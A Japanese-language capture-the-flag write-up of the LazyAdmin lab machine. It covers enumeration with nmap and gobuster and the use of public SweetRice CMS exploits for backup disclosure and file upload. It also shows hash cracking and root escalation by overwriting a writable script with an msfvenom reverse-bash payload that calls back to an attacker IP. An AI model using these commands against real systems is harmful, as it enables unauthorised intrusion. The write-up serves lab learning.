Room: LazyAdmin
Difficulty: Easy
Show: Free
CTF形式でマシン攻略しフラグを取得するタイプのRoomになります。
権限昇格がかなり簡単でしたのでEasyの中でも簡単な方のマシンかと思います。
列挙
nmapにてポートスキャンを行いました。
nmap -v -A -sV 10.10.93.35
上図の通り、80/tcp(http)のopenを確認しましたのでアクセスしてみます。
残念ながらドキュメントルートはApache2 Ubuntu Default Pageでしたので、さらに探索を行っていきます。
gobuster
コマンドを使用して他のページがないか探索していきます。
gobuster dir -u http://10.10.93.35/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
/contentを確認しましたのでアクセスしていきます。
ページ上の情報より、CMS(SweetRice)を使用していることがわかりました。
その他gobusterでは情報を取得できなかったので、CMS(SweetRice)に悪用可能な脆弱性がないかをsearchsploit
コマンドにて確認していきます。
上図の通り、いくつかのexploitコードがあることがわかりました。
この中で、マシン内に侵入するために有用そうだと考えたのが以下の二つです。
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
現状、SweetRiceのバージョンが取得できていないため、上記exploitが使用できるかはわかりませんが、中を確認していきます。
まずは、searchsploit
コマンドでそれぞれのexploitを取得します。
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
上記のソースコードを確認します。
どうやら、ファイルアップロードを行うためにはユーザ名とパスワードが必要なようです。
また、exploitが成功した場合は拡張子が.php5のファイルをアップロードでき、当該ファイルはリモート(kali)からのアクセス可能なようですので、リバースシェルを取得することが出来そうです。
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
続いてもう片方のテキストファイルを確認します。
こちらは、mysqlのバックアップファイルをダウンロードできてしまう脆弱性のようです。
脆弱性を悪用するにあたってはユーザ名やパスワードは必要なさそうですのでhttp://<IP>/content/inc/mysql_backup/
にアクセスし、実際にバックアップファイルが取得できるか確認していきます。
アクセスした結果、バックアップファイルの取得に成功しました。
取得したファイルの中を確認していきます。
cat mysql_bakup_20191129023059-1.5.1.sql
ユーザ名とパスワードらしきものを取得することができました。
パスワードはハッシュ化されているため、hashcat
コマンドにて解読をしていきます。
hashcat
コマンドはモードを指定しないと自動でハッシュモードを判定してくれます。
md4かmd5が怪しいです。
md5にて解読したところ、パスワードを取得することに成功しました。
hashcat -m 0 -a 0 hash.txt rockyou.txt
ユーザ名、パスワードが取得できたので、前述のexploitを使用してリバースシェル用のペイロードをアップロードしていきます。
まずは、ペイロードの作成を行います。
作成にあたってはこちらのペイロードを使用します。
「CHANGE THIS」の部分を自身のマシン情報に書き換えて、「shell.php5」として保存します。
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
kali側で接続を待ち受け、上記exploitを実行します。
アップロード後、ペイロードが配置されたパスへcurl
コマンドを使用し、アクセスを行います。
その後、webサーバ権限のシェルを取得することが出来ました。
権限昇格
sudo -l
にて許可されているコマンドを確認したところ、パスワード無しでroot権限で/usr/bin/perl /home/itguy/backup.pl
を実行できることがわかりました。
/home/itguy/backup.plは/etc/copy.shを実行するスクリプトのようです。
また、ls
コマンドにて、/etc/copy.shは現状の権限でも書き換えができることがわかりました。
上記より、/etc/copy.shをリバースシェル用のペイロードに書き換え、root権限で/usr/bin/perl /home/itguy/backup.pl
を実行したら、root権限のリバースシェルが取得できそうです。
まずは、/etc/copy.shをリバースシェル用のペイロードを作成します。
msfvenom -p cmd/unix/reverse_bash LHOST=10.9.6.236 LPORT=4445 -f raw
次に、作成したペイロードにて、現状のcopy.shを作成したペイロードに書き換えます。
最後に、kaliで接続を待ち受け、root権限で/usr/bin/perl /home/itguy/backup.plを実行します。
無事、root権限のリバースシェルを取得することができました。